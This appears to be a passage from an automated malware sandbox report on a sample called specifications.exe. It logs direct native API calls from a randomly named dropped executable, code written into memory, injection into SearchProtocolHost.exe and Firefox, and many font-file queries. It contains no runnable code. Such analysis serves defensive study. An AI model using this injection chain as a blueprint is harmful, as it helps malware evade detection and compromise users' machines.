                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQueryInformationToken: Direct from: 0x76F02CAC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtTerminateThread: Direct from: 0x76F02FCC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtOpenKeyEx: Direct from: 0x76F02B9C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtProtectVirtualMemory: Direct from: 0x76F02F9C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtSetInformationProcess: Direct from: 0x76F02C5C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtNotifyChangeKey: Direct from: 0x76F03C2C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtUnmapViewOfSection: Direct from: 0x76F02D3C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtCreateMutant: Direct from: 0x76F035CC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtWriteVirtualMemory: Direct from: 0x76F02E3C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtMapViewOfSection: Direct from: 0x76F02D1C
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtResumeThread: Direct from: 0x76F036AC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtReadFile: Direct from: 0x76F02ADC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQuerySystemInformation: Direct from: 0x76F02DFC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtDelayExecution: Direct from: 0x76F02DDC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtQueryInformationProcess: Direct from: 0x76F02C26
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtResumeThread: Direct from: 0x76F02FBC
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; NtCreateUserProcess: Direct from: 0x76F0371C
                      Source: C:\Users\user\Desktop\specifications.exe; Memory written: C:\Users\user\Desktop\specifications.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\specifications.exe; Section loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\specifications.exe; Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: read write
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Thread register set: target process: 8064
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Thread APC queued: target process: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                      Source: C:\Users\user\Desktop\specifications.exe; Process created: C:\Users\user\Desktop\specifications.exe "C:\Users\user\Desktop\specifications.exe"
                      Source: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe; Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                      Source: neghZqrDWkxUmu.exe, 00000006.00000000.1966182889.0000000001840000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000006.00000002.4145112552.0000000001841000.00000002.00000001.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145319558.0000000001111000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Users\user\Desktop\specifications.exe VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\specifications.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
